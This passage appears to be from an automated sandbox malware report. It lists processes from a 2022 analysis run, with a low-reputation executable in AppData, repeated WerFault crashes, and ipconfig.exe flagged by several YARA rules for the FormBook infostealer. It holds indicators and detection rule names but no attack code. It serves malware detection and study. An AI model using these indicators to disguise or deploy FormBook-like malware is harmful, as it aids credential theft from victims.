                                          Path:C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 27%, ReversingLabs
                                          Reputation:low

                                          General

                                          Target ID:6
                                          Start time:02:21:13
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:9
                                          Start time:02:21:18
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
                                          Imagebase:0x140000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:12
                                          Start time:02:21:21
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:low

                                          General

                                          Target ID:13
                                          Start time:02:21:21
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:17
                                          Start time:02:21:23
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420
                                          Imagebase:0x140000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language

                                          General

                                          Target ID:22
                                          Start time:02:21:49
                                          Start date:30/11/2022
                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                          Imagebase:0x210000
                                          File size:29184 bytes
                                          MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group

                                          Disassembly

                                          No disassembly